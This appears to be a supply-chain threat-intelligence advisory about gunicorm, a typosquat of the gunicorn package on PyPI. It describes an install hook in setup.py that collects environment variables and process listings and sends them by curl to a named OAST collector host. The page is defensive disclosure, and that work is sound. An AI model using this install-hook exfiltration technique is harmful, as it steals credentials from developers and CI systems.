Supply-chain threat intelligence

Incident detail

criticalpypi·typosquatting·osv

Malicious code in gunicorm (PyPI)

gunicorm

Risk score

92

AI summary

Indexed incident for gunicorm (pypi).

Description

Package name gunicorm is a single-character edit of the widely-used gunicorn WSGI server and ships no functional code beyond setup.py. setup.py registers custom install and egg_info cmdclasses so that, on pip install or pip download, the package captures the full os.environ and the output of ps -elf, then POSTs the combined data via curl to http://gjampdwmdjmppwedtkpbbdkq05f6iiz6r.oast.fun (an interactsh OAST collector). Environment variables on developer and CI machines routinely contain AWS keys, registry tokens, and other credentials, all of which are exfiltrated unconditionally to an attacker-controlled endpoint over plain HTTP. The README self-describes the package as a proof-of-concept that runs a command on pip download/install. There is no legitimate functionality.

During installation, the package exfiltrates env variables


Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.

Campaign: 2026-06-ip-rotat

Reasons (based on the campaign):

  • The package overrides the install command in setup.py to execute malicious code during installation.

  • exfiltration-env-variables

  • typosquatting

Technical details

Affected versions

=0.0.1

Indicators

  • affected version=0.0.175%

Timeline

  1. Advisory published
  2. Indexed by ThreatPkg

Related incidents